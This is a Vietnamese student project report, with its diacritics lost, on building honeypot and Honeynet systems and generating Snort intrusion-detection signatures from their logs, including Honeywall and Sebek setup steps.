Phat Sinh Mau Cho He Thong Phat Hien Xam Nhap

n 2 : Pht sinh mu cho h thng pht hin xm nhp
1
Hong Th Bch Dng Hunh Quang Sang GVHD : Ths.Mai Xun Ph
LI CM N
u tin, chng em xin chn thnh cm n Thy Mai Xun Ph, tn tnh
hng dn, ng gp kin v cung cp ti liu tham kho cn thit chng em c
th hon thnh bi lm mt cch tt nht.
Chn thnh cm n n Trng i Hc Cng Nghip TP H Ch Minh, cng
cc thy c trong khoa Cng ngh thng tin bin son ti liu, sch v v to iu
kin mi trng tt nht chng em c th hc hi, trao i, tham kho ti liu v
tm kim thng tin phc v cho vic thc hin n ca mnh.
Nhng thiu st l kh trnh khi, nhm chng em mong nhn c kin ng
gp ca tt c cc thy c v bn b c th hon thnh tt hn nhng n sau.

Chng em xin chn thnh cm n!!!

TP.H Ch Minh, ngy 21 thng 11 nm 2013
Nhm sinh vin thc hin

2
NHN XT CA GIO VIN HNG DN
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
TP.HCM, ngy.thng.nm 2013
Gio vin hng dn

Ths.Mai Xun Ph

3
NHN XT CA GIO VIN PHN BIN
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
......................................................................................................................................
TP.HCM, ngy.thng.nm 2013
Gio vin phn bin

Ths.Nguyn Ha

4
PHN CNG CNG VIC

H v tn Cng vic
Hunh Quang Sang
- Tm hiu chi tit v IDS
- Tm hiu ng dng Snort
- Trin khai, ci t, vn hnh NIDS
- Tm hiu c ch pht sinh mu
- Xy dng h thng pht sinh mu cho IDS
Hong Th Bch Dng
- Tm hiu chi tit v Honeypot
- Tm hiu cc ng dng Honeywall, Sebek..
- Trin khai, ci t, vn hnh Honeynet
- Tm hiu c ch pht sinh mu
- Xy dng h thng pht sinh mu cho IDS

5
MC LC
No table of contents entries found.

TNG QUAN
An ninh h thng l mt trong nhng lnh vc m hin nay ang kh c quan
tm, khng ch gi gn trong c quan hay cng ty, x nghip m trong c phm vi ton
cu. Vi tc pht trin mnh m ca Cng ngh thng tin, bn cnh nhng li ch
m n mang li, th nguy c tn cng nhm ph hoi h thng, xm nhp mng
nh cp thng tin hay thay i d liu vi nhng mc ch xu vn tn ti v ngy
cng ln mnh. Theo thng k ca t chc CERT (Computer Emergancy Response
Team) s v tn cng ngy cng tng. Nm 1989 c khong 200 v, n nm 1991 c
400 v, nm 1994 tng ln n 1330 v, c ti 8064 l hng c pht hin vo nm
2006 (tng 35% so vi nm 2005) v s cn tng mnh trong thi gian ti. Ti Vit
Nam, ch tnh t u nm 2013 n nay c khong 2405 website ca cc c quan,
doanh nghip b xm nhp, c bit nht l trong thng 7 va qua, hng lot website
ca cc bo in t ln b tn cng bng phng thc t chi dch v (DDoS) nh
Tui tr, VietNamNet, Dn Trkhin nhiu bo trong tnh trng nghn truy cp, t
lit trong thi gian ngn.
V vy, vic trin khai mt h thng an ninh m bo c ch bo mt tt, trnh
c cc nguy c tn cng, ph hoi, m bo an ton thng tin l thc s rt cn thit
trong thi i cng ngh hin nay.
C nhiu phng php chng li s tn cng ca hacker, m bo an ton cho
h thng my tnh nh Firewall hay vic m ha thng tin Tuy nhin, khi hacker
chim mt h thng my tnh lm cng c tn cng cc my tnh khc, hoc cc
cuc tn cng xut pht t bn trong mng ni b, th Firewall khng th pht hin v
ngn chn. Trong trng hp ny, IDS c xem l gii php tt nht v IDS c th
pht hin ra cc cuc tn cng, cho d cc cuc tn cng l xut pht t bn trong hay
bn ngoi mng ni b. S kt hp gia IDS v h thng HoneyPot cng c xem l
6
mt gii php c hiu qu cao, c th pht hin ra cc cuc tn cng v truy tm c
th phm : HoneyPot vi mc ch li ko hacker tn cng vo h thng gi c b
tr bn cnh h thng tht nhm thu thp cc k thut tn cng, thng tin v hacker v
ghi li Log. IDS kt hp vi Honeypot thm cc log m Honeypot bt c vo
danh sch signature trong IDS, da vo cc du hiu trong signature, t IDS c th
pht hin cc cuc tn cng ph hoi h thng, thc hin cc chc nng gim st -
cnh bo - bo vm bo an ton cho h thng mng, hn ch ti a nhng s c
c th gp phi v gp phn gip h thng pht trin mt cch n nh, lu di.
c th hiu r hn v khi nim, chc nng, cc bc thu thp k thut, c
ch hot ng, pht sinh muca HonneyPot v IDS. Nhm chng em nghin
cu v thc hin n Pht sinh mu cho h thng pht hin xm nhp vi :
Mc tiu ti :
Nm vng v IDS, hiu c c ch hot ng ca IDS v cch pht
sinh mu.
Nm r khi nim, phn loi, chc nng v cc bc hot ng ca h
thng HoneyPot.
Trin khai c h thng Honeypot v xy dng h thng pht sinh mu
(signature) cho IDS t log ca Honeypot.
Phng php nghin cu :
Nhm ch yu tm kim ti liu trn sch v, cc bi bo, mng Internet.
Tham kho kin ng gp ca thy c v bn b.
Nghin cu thng qua nhng ti liu ting anh do thy c cung cp.
i tng nghin cu :
H thng Honeypot, IDS
ng dng Snort, Honeywall, Sebek
Cu trc bo co gm 4 chng :
Chng I : Tng quan v IDS
Chng II : Tng quan HoneyPot
Chng III: Trin khai NIDS v Honeynet
Chng IV: Xy dng h thng pht sinh mu cho IDS
7

8
Chng I : Tng quan v IDS
Hin nay c nhiu phng php c ng dng v pht trin m bo an ninh
cho h thng mng my tnh nh Firewall, m ha v IDS (h thng pht hin xm
nhp) cng l mt trong nhng phng php trnh c cc cuc tn cng t
hacker bng cch gim st ti nguyn my tnh v gi cnh bo v cc hot ng bt
thng hoc cc mu l
hiu r hn, trong chng Tng Quan V IDS ny, nhm s trnh by chi
tit v khi nim IDS, c ch hot ng v cc chc nng c bn ca chng cng nh
ngha, tm quan trng m h thng IDS em li cho an ninh mng.
1. Gii thiu IDS:
a. Khi nim :
H thng pht hin xm nhp (Intrusion Detection System IDS) l mt
h thng lm nhim v gim st, thu thp thng tin v lu thng trong mng.
T ng theo di cc s kin xy ra trong h thng my tnh, sau phn
tch pht hin ra cc vn an ninh kh nghi, thng bo cho ngi qun
tr.
H thng IDS pht hin tn cng da vo cc du hiu tn cng bit
hoc bng cch so snh lu lng mng hin ti vi lu lng mng bnh
thng ca h thng tm ra cc du hiu khc thng, to cnh bo cho
nh qun tr kha cc kt ni ang tn cng. IDS cn c th phn bit
c mt cuc tn cng l xut pht t bn trong mng ni b hay l t bn
ngoi (hacker).
b. Chc nng :
H thng pht hin xm nhp IDS c cc chc nng c bn sau :
Gim st lu lng mng v gim st cc hnh ng kh nghi.
Cung cp cho nh qun tr nhng thng tin v s tn cng, xm
nhp nh phng php tn cng, cng c tn cng...
To cnh bo cho h thng v nh qun tr khi c nhng hnh
ng kh nghi ang thc hin tn cng vo h thng.
9
IDS c th pht hin ra cc cuc tn cng ph hoi da vo cc
du hiu bit hoc so snh thng lng mng hin ti vi
thng lng mng bnh thng trc .
Phn bit c tn cng l t bn ngoi hay xut pht t bn
trong mng ni b.
p ng yu cu truy cp thng tin ca nhng ngi dng hp
php v ngn chn nhng ngi dng bt hp php truy cp bng
cch dng nhng thit lp mc nh v s cu hnh t nh qun tr
chng li k xm nhp v ph hoi.
2. Cc thnh phn c bn ca IDS :
Mt h thng IDS c ba thnh phn c bn l : Thu thp gi tin, phn
tch gi tin v thnh phn phn hi.

Thnh phn c bn ca I DS
Thnh phn thu thp gi tin (Information Collection)
Thnh phn ny c nhim v kim tra cc gi tin lu thng trn
mng. NIC card c t ch promiscuous mode, nn tt c
cc gi tin i qua chng u c ghi li, x l, ...ri sau c
chuyn n thnh phn phn tch gi tin.
Thnh phn pht hin gi tin (Detection)
y l thnh phn quan trng nht ca h thng pht hin xm
nhp IDS. thnh phn ny, cc cuc tn cng hay cc gi tin
10
cha m c s b pht hin bng cc phng php pht hin xm
nhp ca h thng nh da vo s bt thng, da vo mu
(Signature)
Thnh phn phn hi h thng (Response)
Khi c du hiu xm nhp hay tn cng ph hoi vo h thng th
thnh phn pht hin tn cng s gi tn hiu bo hiu c s tn
cng n thnh phn phn ng. Sau thnh phn phn ng s kch
hot chc nng chn cuc tn cng, xm nhp Firewall v thng
bo cho ngi qun tr c bin php phng chng kp thi.
3. Phn loi IDS :
C hai loi IDS l Host Based IDS (HIDS) v Network Based IDS (NIDS) :
a. Networks Based IDS :
Networks Based IDS hay NIDS c th l mt thit b phn cng hoc
phn mm, c ci t gim st hot ng, theo di ton b d liu
trao i trn mt phn on mng gm nhiu host.
NIDS s kim tra gi tin, qut header ca cc gi tin, v c th kim tra
ni dung ca cc gi pht hin ra cc on m nguy him hay cc
dng tn cng khc nhau.
Trong h thng NIDS, cc sensor c t ti cc im c th, nhng v
tr trng yu l c th gim st lu lng trn ton mng, phn tch cc
gi tin pht hin tn cng, v vy chi ph tng i thp. Tuy nhin,
khi lu lng mng hot ng mc cao, c th s xy ra hin tng
nghn mng. NIDS cng khng th phn tch c cc lu lng m
ha nh SSH, SSL

11

hnh trn, thit b mu l ni NIDS c ci t, n nm gia h thng
internet bn ngoi v mng ni b bn trong, v ch cn 1 NIDS l c th
gim st ton b my tnh trong h thng mng.
b. Host Based IDS :
Host Based IDS hay HIDS l mt phn mm, c ci t trn mt my
tnh cc b nht nh, thay v gim st hot ng trn ton mng nh
NIDS, th HIDS ch gim st hot ng, gim st lu lng, quan st file
log trn mt host, pht hin cc cuc tn cng trc tip n mt host c
th.
HIDS c th phn tch cc lu lng c m ha. c ci t trn
nhiu kiu my khc nhau nh my ch, my trmv vy HIDS linh
hot hn NIDS.
Khi gi tin i n my ch host, n s c phn tch v forward nu
khng c cha m c. Tuy nhin HIDS c nhc im l ch ph cao
hn so vi NIDS, do n phi c thit lp trn tng host mun gim
st, vic qun l, cp nht, cu hnh cng tr nn kh khn hn. HIDS
c ci t trn cc host, nn n s ph thuc vo h iu hnh ca
my . HIDS ch yu pht hin cc cuc tn cng bng cch s dng
cc thng tin lu trong file log.
12
HIDS c thit k hot ng ch yu trn h iu hnh Windows.

Nhng thit b mu vng trong hnh l nhng host c t HIDS.
4. C ch hot ng ca IDS :
IDS c rt nhiu chc nng, trong hai chc nng chnh ca h thng
IDS l pht hin cc cuc tn cng v to ra cnh bo bo hiu cho h
thng hay ngi qun tr v cc cuc tn cng .
V pht hin mt hot ng l bnh thng hay c mc ch tn cng ph
hoi th IDS da vo hai phng php chnh l da trn s bt thng v
da trn mu (signature) :
a. Da trn s bt thng :
phng php ny, s c mt thit lp profile cho hin trng cc
hot ng bnh thng ca h thng v mt hin trng hin hnh ca h
thng . Khi hin trng hin hnh c s khc bit so vi hin trng bnh
thng ca h thng, c ngha l c s xm nhp.
V d, cc my tnh trong h thng mng thng hot ng v
thc hin gi nhn thng tin t 7h sng n 5h ti, nhng khi c mt
my tnh hot ng lc 8h ti v ang thc hin gi hoc nhn d liu
tc l c du hiu bt thng v kh nng ang b tn cng l rt cao.
Phng php ny gip h thng c th pht hin c nhng kiu
tn cng cha bit trc. hot ng chnh xc, IDS da vo phng
php ny phi thc hin qu trnh gim st hot ng ca h thng lc
13
bnh thng thng k cc s liu hot ng ca h thng, lm c s
pht hin cc bt thng v sau.
b. Da trn mu (Signature) :
Signature cha nhng thng tin cn thit m t cc kiu tn
cng bit trc.
Vi phng php ny, cc gi tin i vo h thng s c so snh
vi cc du hiu (signature) c lu trong d liu ca IDS, nu c s
ging nhau, IDS s to ra cnh bo n nh qun tr.
Hin nay, h thng pht hin xm nhp da trn du hiu ang
c s dng rt ph bin, v chng d pht trin, to ra cc cnh bo
chnh xc. Tuy nhin, vi mi mt cuc tn cng hay bin th ca n u
phi thm du hiu v a vo c s d liu ca IDS, v vy kch c ca
n tr nn rt ln.
Phng php ny i hi phi duy tr mt c s d liu v cc
du hiu xm nhp v c s d liu ny phi c cp nht thng
xuyn mi khi c mt hnh thc hoc k thut xm nhp mi.

14
Chng II : Tng quan v Honeypots
Honeypots l mt cng ngh mi trong lnh vc an ninh mng my tnh, vi
nhim v gi dng h thng tht, quan st cc cuc tn cng ca hacker, m bo an
ton cho ti nguyn h thng, Honeypots c coi l mt trong nhng h thng by rt
hiu qu.
Trong chng ny, nhm s trnh by cc ni dung kin thc c bn v khi
nim, phn loi, mc ch ngha ca Honeypots, cng nh chc nng, vai tr, v tr
t h thng v s lc v Honeynet trong nhim v m bo an ninh mng - mt
loi hnh tng tc mc cao ca Honeypots.
1. Khi nim, vai tr, ngha ca Honeypots :
a. Khi nim :
Thut ng Honeypot c nhc n ln u tin vo ngy 4 thng 8
nm 1999, trong bi bo To Build a Honeypot ca tc gi Lance Spitzner
mt trong nhng ngi ng ra thnh lp d n Honeynet, gii thiu v
tng xy dng h thng Honeynet nhm mc ch nghin cu cc k thut
tn cng ca Hacker. T , c bin php ngn chn tn cng kp thi. [1]
Honeypots c th c hiu nh l mt h mt by cn trng theo
ngha en. Cn i vi mi trng an ton mng, th honeypots l mt h
thng ti nguyn thng tin, bi v n c th gi dng bt c my ch ti
nguyn no nh Mail server, FTP, Domain Name server, Web
servernhng dch v m hacker quan tm, nhm thu ht s ch chng,
khi chng s tn cng vo h thng gi dng ny, thay v tn cng vo
h thng tht.
b. Vai tr ngha :
Khi hacker thc hin tn cng vo h thng gi dng ca honeypots, lc
ny honeypots s quan st cc cuc tn cng ca hacker, ghi li nht k, bt
cc chc nng cnh bo Mc tiu ca Honeypots l gim st v kim tra
hot ng ca hacker sau khi chng ly c quyn kim sot trn cc my
tnh trong Honeypots, nhm lu li du vt xm nhp ca chng v gii m
cc phng php tn cng, cng nh cch thc tn cng. H thng
15
honeypots c trin khai cng ging h thng tht th cng d dng nh
la c hacker.
H thng honeypots l bn sao ca mt h thng tht, nhng c nhng l
hng bo mt c c tnh dng ln, v thng cha thng tin trng c gi
tr nh cc ti khon ngn hng, thng tin chng khon Nhm thu ht k
tn cng, lm chng ch n v tn cng vo h thng gi dng ny. H
thng honeypots trc tip tng tc vi hacker v khai thc nhng thng tin
cn thit v chng, ngn cho chng khng tip xc c vi h thng tht,
bo v an ton cho h thng, trnh c nhng mi nguy him t hacker.
c. u im, nhc im ca honeypots :
u im :
Honeypots ch nm gi thng tin ca nhng hnh ng c
hi hoc kh nghi, v vy m lng thng tin honeypot thu
thp c rt t nhng thng tin c gi tr cao, d dng
phn tch d liu.
Do honeypots khng gim st v nm bt nhiu hot ng
nn thng khng gp vn v cn kit ti nguyn.
Honeypot ch gim st nhng hot ng nhm vo chnh
n, v vy m n khng yu cu mt lng ln b nh hay
a
Honeypots l mt cng ngh n gin, d cu hnh v s
dng, t li hoc cu hnh sai. N ch nm bt nhng hnh
ng kh nghi m khng phn bit nhng iu g tng tc
vi n, v vy c th lm vic tt trong mi trng m ha
hay Ipv6.
Nhc im :
Bt li nht ca honeypots l n c mt lnh vc rt hp :
Honeypots ch thy v nm bt nhng hot ng chng li
n. Nu hacker thc hin tn cng vo cc h thng khc,
honeypots s khng gim st v nm bt c nhng hot
ng tn cng ny.
16
Honeypots c th s gp ri ro, b hacker xc nh c
rng l mt h thng gi. Khi , hacker s c tnh cung
cp nhng thng tin sai lch cho honeypots honeypots
nghin cu. Thng tin ny s lm cho honeypots a ra kt
lun khng chnh xc v hacker. T hacker c th tn
cng n h thng tht v gy tn hi cc h thng khc.
V nhng nhc im trn, honeypots khng th thay th cc c ch bo
mt khc nh tng la v h thng pht hin xm nhpnhng thay vo ,
Honeypot s ghi li log, t d tm c cc thng tin v hacker, lm chng
c cho vic kin co. Bn cnh , h thng Honeypot cn chu cc cuc tn
cng ca hacker thay cho h thng tht, m bo h thng tht an ton.
2. V tr t Honeypots :
C ba vng chnh t h thng Honeypots :
a. External Placement (t vng ngoi) :
Vng ngoi l vng nm pha trc Firewall, bn ngoi h thng mng
ni b. Khng c Firewall ngn cch gia cc honeypot v h thng
mng Internet bn ngoi, v vy ri ro thng cao hn so vi cc v tr
khc.
17
b. Internal Placement (t vng trong) :
Honeypots nm bn trong mng ni b, c ngn cch vi Internet
bng Firewall. y l v tr t honeypots tt nht c th to cnh bo
sm nu c bt k hot ng khai thc no t bn ngoi vo bn trong
mng, bo v mng ni b an ton, nm gi cc mi e da. Vng
internal l mt vng ng tin cy.
c. DMZ Placement (t vng DMZ) :
Vng DMZ (De-militarizet Zone) nm ring l so vi mng ni b, vic
t honeypots trn vng DMZ thng c cc cng ty la chn. N
cha nhng dch v m bn ngoi c th truy cp vo c (s c gii
hn). N c th c t dc theo cc my server (Mail server, Web
server) trong vng DMZ v cnh bo sm cc mi e da cho v tr
. DMZ c th c cc a ch IP public v private. Tuy nhin,
honeypots nm trong vng DMZ khng phi l v tr tt nht cho vic
cnh bo sm nu c cuc tn cng lm h hi mng ni b. y l
vng tin cy mt na.
So snh gia cc v tr t honeypots :
V tr u im Nhc im
Vng ngoi
D xy dng v d trin
khai
iu khin d liu km.
Mc ri ro cao.
Vng trong
Tt cho vic gim st mng
ni b.
H thng cnh bo sm.
Ci t phc tp.
Vng DMZ iu khin d liu tt.
Ci t phc tp, h thng
cnh bo khng c mnh,
kh bo v mng ni b.

3. Phn loi :
Honeypots c chia lm 2 loi :
Tng tc thp : M hnh Honeypots mc tng tc thp khng
cung cp cc dch v, ng dng v h iu hnh tht tng tc vi
18
Hacker. M cc dch v, ng dng, h iu hnh ch c m phng
gi, nn vic thu thp thng tin b hn ch, gii hn v dch vtuy
nhin d trin khai, bo dng v mc ri ro thp do thit k ca
chng n gin v cc chc nng mc c bn nht. Mt s loi
hnh Honeypots mc tng tc thp nh :
BackOfficer Frendly : thng c gi l BOF y l mt
trong nhng honeypots n gin nht s dng, c thit
k c th vn hnh trn hu ht h thng Windows hay
Linux, nhng n ch yu c trin khai trn h thng
Windows. Vic ci t BOF rt n gin, d cu hnh v bo
tr thp. Tuy nhin, BOF c gii hn pht hin v cnh
bo cc cuc tn cng ch c trn 7 cng tng ng vi 7 dch
v (FTP cng 21, SMTP cng 25, HTTP cng 80, POP3
cng 110, Telnet cng 23, IMAP cng 143, Back Orifice
cng UDP 31337). BOF khng ng nhp c t xa, v
khng c cc tnh nng ty chnh, cu hnh.
Specter : Ging BOF, Specter cng l mt loi hnh honeypots
tng tc thp. Tuy nhin c nhiu chc nng hn BOF, c
kh nng cnh bo v ghi li. Loi honeypots ny c th gi
lp trn 14 cng. D trin khai, n gin duy tr v ri ro
thp. Specter b gii hn v s lng thng tin m c th thu
thp c so vi tng tc cao. Bn cnh m phng cc dch
v khc nhau, Specter cn c kh nng m phng 13 h iu
hnh khc nhau. Tnh nng ny ca Specter cung cp s linh
hot xc nh cc mi e da vi nhng h iu hnh khc
nhau. Specter khng th nghe hay theo di mt cng c
s hu bi mt ng dng khc. V d, nu chy Web Server
trn my tnh c nhn, Specter s khng th gim st cng 80.
Honeyd : Honeyd l mt honeypots tng tc thp m ngun
m, mc ch ca n l pht hin, nm bt v cnh bo cc
hot ng kh nghi, n to ra a ch IP khng h tn ti, v
19
khi hacker tm cch tn cng n IP ny, th honeyd s
dng IP khng tn ti tng tc vi k tn cng, thu
thp thng tin, honeyd c th gim st n hng triu IP khng
tn ti cho cc kt ni. N c th lng nghe trn tt c cc
cng UDP, TCP, cung cp kh nng ton quyn truy cp vo
m ngun. Honeyd c th m phng cng mt lc nhiu h
iu hnh khc nhau (m phng c 473 h iu hnh).
c thit k cho nn tng Unix, Honeyd tng i d dng
ci t v cu hnh da vo giao din dng lnh. Tuy nhin,
Honeyd khng th cung cp mt h iu hnh tht tng
tc vi hacker, v cng khng c tnh nng cnh bo khi pht
hin xm nhp.
Tng tc cao : mc tng tc ny, Honeypots c ci t, chy
cc dch v, ng dng v h iu hnh tht, hon ton ging vi mt
mng lm vic bnh thng. Loi ny c mc thu thp d liu,
thng tin cao hn tng tc thp, tuy nhin mc ri ro cng cao
(do chy cc ng dng, h iu hnh, dch v thtnn vic cu hnh
trin khai rt phc tp, d xy ra li trong thit k); phc tp, tn thi
gian trong vic trin khai, bo dng. V Honeynet l mt loi hnh
c trng cho mc tng tc ny.

20
Chng III: Xy dng h thng Honeynet v NIDS
phn tng quan Chng I v Chng II, ta bit Honeynet l mt loi hnh
honeypot tng tc cao v NIDS (Network base IDS) l mt phn loi ca IDS , gim
st lung d liu ra vo mng l ch yu. Hai h thng ny cn trin khai cu hnh
nhng g? Cu hnh nh th no? V mc tiu ca vic xy dng h thng Honeynet,
NIDS l g?...Trong chng tip theo ny, nhm s gii thiu chi tit hn v m hnh
kin trc lm vic, vic trin khai, ci t, vn hnh honeynet v Snort. Cu hnh cho
sebek, honeywall i vi honeynet v cu hnh rule, to c s d liu cho Snort i
vi NIDS c th trnh c cc i tng tn cng, bo v h thng mng cng
nh d liu trong h thng mt cch hiu qu nht.
1. H thng Honeynet
Honeynet l mt loi hnh honeypot mc tng tc cao, vi vic chy cc
ng dng, dch v, h iu hnh tht, honeynet thu thp d liu cao hn, tuy
nhin ri ro cng tng i ln, do vic thit k, trin khai v cu hnh rt
phc tp.
Mc ch xy dng honeynet l :
Thu thp cc k thut, phng php tn cng, cc cng c m hacker
s dng.
Gip sm pht hin ra cc l hng tn ti trn h thng tht. T ,
sm c bin php khc phc kp thi. ng thi, kim tra an ton
ca h thng mng, cc dch v mng (Web, DNS, Mail,...) v an
ton, tin cy, cht lng ca cc sn phm cng ngh thng tin khc
(c bit l cc H iu hnh nh: Unix, Linux, Window,...).
Thu thp cc thng tin, du vt ca hacker (nh: a ch IP ca my
hacker s dng tn cng, v tr ca hacker, thi gian hacker tn
cng,...). c th truy tm th phm.
1.1 M hnh kin trc ca Honeynet :
1.1.1. Kin trc vt l :
a. M hnh kin trc honeynet th h I (GenI):
Honeynet u tin ra i nm 1999, c gi l Gen I.
21
GenI Honeynet l mt h thng mng c t ring bit vi mng
tht m bo an ton cho h thng. GenI Honeynet gm cc
honeypot c ngn cch vi mng Internet bn ngoi bng
Firewall, tt c cc lung d liu vo ra honeynet u phi qua thit
b Firewall ny.
H thng Firewall v h thng pht hin xm nhp (IDS) l hai h
thng tch bit.

M hnh kin trc vt l Honeynet th h u tin (Gen I)
Firewall s kim sot lu lng thng tin ra vo h thng v dng
cc lut (rule) hoc deny, allow nhm lm cho hacker tn cng vo
honeynet m khng phi l h thng mng tht.
Mc ch chnh ca honeynet th h ny l nm bt cc hnh
ng ca hacker. Lng thng tin m honeynet thu gi tng i
ln v chng c th pht hin c nhng tn cng, cng nh cc
cng ngh m hacker s dng.
b. M hnh kin trc honeynet th h II, III (GenII, GenIII) :
Nm 2001, th h honeynet th hai ra i. Gen III ra i cui nm
2004.
22
Khc vi th h honeynet u tin, m hnh honeynet II v III, h
thng Firewall v IDS khng cn c lp, m n c kt hp li
vi nhau thnh mt h thng gateway duy nht gi l Honeywall
iu khin vic kim sot d liu v thu nhn d liu.

M hnh kin trc vt l honeynet Gen II, Gen III
hnh trn, Honeywall c ba card mng : eth0 ni vi Internet
bn ngoi(Pha ng i ca hacker) khng c a ch IP, eth1 ni
vi mng cha cc honeypot cng khng c a ch IP, nh vy m
hacker kh pht hin ra chng ang tng tc vi mt h thng gi
dng honeynet.
c. M hnh honeynet o :
Honeynet o l mt m hnh kin trc vt l mi, hot ng
tng t nh honeynet th h hai v ba, vi mc ch lm gim
chi ph cho h thng honeynet v d dng cho vic qun l bng
cch s dng cc cng c VMWare v User Mode Linux to ra
nhiu my o trn 1 h thng my tht.
23
VMWare c th chy nhiu h iu iu hnh khc nhau cng
mt lc, tuy nhin, n ch chy trn kin trc Intel. i vi User
Mode Linux (UML) l gii php m ngun m, cng c tnh nng
l to ra cc my o trn h thng my tht nh VMWare, tuy
nhin n thng c dng cho h iu hnh Linux.
Hin nay, honeynet o l m hnh c s dng ph bin nht
trong cc m hnh vt l nu trn.
1.1.2. Kin trc logic :
Phng thc lm vic, hot ng ca honeynet c th hin
qua ba chc nng chnh l :
iu khin d liu (kim sot d liu) : c nhim v kim
sot d liu ra vo h thng Honeynet, kim sot cc hot
ng ca hacker, ngn chn hacker s dng h thng mng
Honeynet tn cng hay gy tn hi cho cc h thng
khc. thc hin nhim v ny, Honeynet s dng hai
cng c chnh l Firewall Iptables v IDS-Snort.
Thu thp d liu : c nhim v thu thp thng tin, gim st
v ghi li cc hnh vi ca k tn cng bn trong h thng
Honeynet. thc hin nhim v ny, Honeynet s s
dng cng c Sebek client- server.
Phn tch d liu : c nhim v h tr phn tch k thut
thu thp c nhm a ra k thut, cng c v mc ch
tn cng ca hacker. T a ra cc bin php phng
chng kp thi. Honeynet s s dng cc cng c Walley,
Hflow thc hin nhim v.
Qu trnh hot ng ca honeynet :
24
Cc lung d liu i vo s c honeynet kim sot bng cc
chnh sch Rule ca Iptables ( Firewall Iptables cha cc rule
nh ngha s cho php hoc khng cho php cc truy cp ra
vo h thng v kim sot cc lung d liu i qua honeywall)
bn cnh , nh ngha du hiu tn cng, honeynet da
vo cc chnh sch rule ca IDS-Snort (s c trnh by
mc sau).
Tip tc honeynet dng cng c Sebek client server thu
nhn d liu i vo h thng v chuyn tt c nhng thng tin
thu nhn c vo c s d liu lu tr.
Cui cng h thng s s dng cc cng c nh walley, Hflow
tin hnh phn tch d liu thu thp c trong c s d
liu. T a ra kt qu phn tch xem honeynet c ang b
tn cng hay khng? Phng php tn cng v cng c s
dng l g?...T a vo rule ca Snort, lm du hiu nhn
bit tn cng cho h thng honeynet nhng ln sau.
1.2 Xy dng m hnh mng chi tit cho h thng :
25
1.3 Trin khai, ci t v vn hnh Honeynet :
a. Cu hnh Honeywall :
Khi xy dng mt h thng honeynet, quan trng nht l honeywall,
tt c cc lung d liu ra hoc vo honeypot u phi i qua honeywall
ny.
Honeywall hot ng nh mt Gateway gia mng Internet bn ngoi
v mng li cc honeypot, v vy cu hnh honeywall l bc quan
trng nht trong vic thit lp h thng honeynet. Gm cc cu hnh c
bn sau :
Nhp a ch IP cho honeypot, mc nh l 10.0.0.20 (nu c
nhiu my honeypot, nhp IP cho tng my honeypot cch nhau
bng khong trng). y l nhng a ch m hacker s tn cng.

Nhp a ch Broadcast ca honeypot cho IP trn.

Tip theo cu hnh IP cho interface eth2 ( l ca manager). y,
nhm dng a ch IP cho interface manager l 10.10.10.66

26
Nhp Subnetmask cho IP interface manager

Nhp Default gateway cho interface manager (10.10.10.66)

Nhp vo tn min nu c cho interface qun l (eth2 :
10.10.10.66)

G vo a ch IP ca my ch DNS local domain

Bc cu hnh tip theo h tr cho vic qun l t xa cc my
honeypot l SSH. Mc nh sshd lng nghe trn cng 22
(TCP/UDP). Chn Yes/No thit lp sshd t ng bt/tt lc
khi ng
27

Nhp vo danh sch gii hn cc cng c php kt ni qun l t
xa thng qua ssh. Thng thng ch c 2 cng c php l 22 v
443.

c th phn tch d liu : enable Walley. Nhp vo danh sch
cc cng TCP cho php kt ni ra bn ngoi.

Nhp vo danh sch cc cng UDP c php kt ni ra bn ngoi.

Thit lp phm vi hn ch kt ni ra bn ngoi cho UDP, TCP,
ICMP v cc giao thc khc. y, nhm thit lp phm vi Hour
(gi)
28

cho gii hn cng TCP l 20

Nh vy, trong khong thi gian 1 gi, k tn cng s gi c 20 kt ni
TCP. Khi n gii hn, chng s khng th gi thm c cc kt ni. Sau
1 gi, kt ni s c thit lp li. Tng t vi UDP v cc giao thc
khc.
Honeywall cn c tnh nng Filtering (b lc) cho php lc cc gi
tin khc nhau, cung cp kh nng kim sot d liu.
Thit lp ng dn v file cha danh sch en (/etc/blacklist.txt),
danh sch en l danh sch cha nhng IP s b chn.

Tng t thit lp ng dn v file cha danh sch trng
(/etc/whitelist.txt).
Khi mun cho php cc my honeypot trong mng honeynet c th
truy cp khng gii hn n cc DNS server. Chn Yes :
29

Sebek l mt cng c thu thp d liu, n nm bt tt c cc hot ng
trn honeypot v gi d liu n my ch. Sebek cn cu hnh cc bc sau :
Xc nh a ch IP ch ca gi tin Sebek

Xc nh cng UDP ch cho cc gi sebek. Mc nh l 1101.

ng nhp vo giao din qun l (interface manager). Nhp vo trnh
duyt web my qun l a ch ip ca interface manager (eth2) c thit
lp l https://10.10.10.66 . Trang ng nhp hin th, ng nhp vi tn roo. Khi
ng nhp thnh cng, chng ta c th qun l honeywall, xem cc d liu
c thu thp, phn tch

30

31
b. Ci t Sebek client:
Trong h thng Honeynet, cc my tnh honeypot cn phi ci t
sebek client, vi mc ch ghi li log v cc phng php tn cng ca
hacker, t a log v cho sebek server honeywall, t log bt c
ny, honeywall s to cc rule snort v c th ngn chn cc cuc tn
cng dng ny nhng ln sau.
Nhm s dng my honeypot l Ubuntu Server 7.10 ci t sebek
client, vi gi ci t l sebek-lin26-3.2.0b-bin.tar.gz
Sau khi ci t Ubuntu Server v log on vo h thng, thc
hin gii nn gi sebek vi lnh :
tar zxf sebek-lin26-3.2.0b-bin.tar.gz
i n th mc sebek-lin26-3.2.0b-bin bng lnh :
cd sebek-lin26-3.2.0b-bin

Sau khi n th mc sebek-lin26-3.2.0b-bin, m file
sbk_install.sh bng lnh
nano sbk_install.sh
Sau khi file cu hnh ca sbk_install.sh hin ra nh hnh di

32

Tip tc cu hnh cho ni dung file, Destination Port thm vo
1101 (tcp/udp), v Destination Mac thm vo a ch Mac ca
